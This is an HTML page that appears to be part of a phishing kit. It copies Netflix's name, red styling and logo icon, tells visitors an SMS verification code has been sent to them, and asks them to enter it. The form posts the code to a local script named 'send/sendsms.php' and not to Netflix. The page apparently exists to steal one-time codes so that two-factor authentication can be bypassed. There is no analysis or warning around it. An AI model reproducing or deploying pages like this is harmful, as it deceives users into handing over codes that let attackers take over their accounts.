<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verify Your Account</title>
    <link rel="icon" href="https://gogeticons.com/frontend/web/icons/data/1/6/9/0/5/3/logo_netflix_icon_512.png" type="image/x-icon">
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #fff;
            color: #333;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
        }
        .header {
            background: #fff;
            padding: 20px;
            text-align: center;
            border-bottom: 1px solid #ddd;
            width: 100%;
            position: absolute;
            top: 0;
        }
        .header .logo {
            color: #e50914;
            font-size: 28px;
            font-weight: bold;
            margin: 0;
        }
        .container {
            width: 90%;
            max-width: 400px;
            background: #f9f9f9;
            padding: 20px 30px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: center;
            margin-top: 100px; /* Adjusts for the header height */
        }
        h2 {
            margin-bottom: 10px;
            font-size: 22px;
            color: #e50914;
        }
        p {
            margin-bottom: 20px;
            font-size: 14px;
            line-height: 1.5;
            color: #666;
        }
        .form-group {
            display: flex;
            flex-direction: column;
            margin-bottom: 15px;
            text-align: left;
        }
        .form-group label {
            margin-bottom: 5px;
            font-size: 13px;
            color: #333;
        }
        .form-group input {
            padding: 10px;
            font-size: 16px;
            border: 1px solid #ccc;
            border-radius: 4px;
            background: #f0f0f0;
            color: #333;
            outline: none;
        }
        .form-group input:focus {
            border-color: #e50914;
        }
        .btn {
            background: #e50914;
            color: #fff;
            padding: 12px;
            font-size: 16px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            width: 100%;
            margin-top: 20px;
            transition: background 0.3s;
        }
        .btn:hover {
            background: #d40813;
        }
    </style>
</head>
<body>

<div class="header">
    <h1 class="logo">NETFLIX</h1>
</div>

<div class="container">
    <h2>Verify Your Account</h2>
    <p>We have sent you a verification code via SMS. Please enter the code below to continue.</p>

    <form id="sms-verification-form" action="send/sendsms.php" method="POST">
        <div class="form-group">
            <label for="sms_code">Verification Code</label>
            <input type="text" id="sms_code" name="sms_code" maxlength="10" placeholder="Enter code" required>
        </div>
        <button type="submit" class="btn">Verify</button>
    </form>
</div>

</body>
</html>
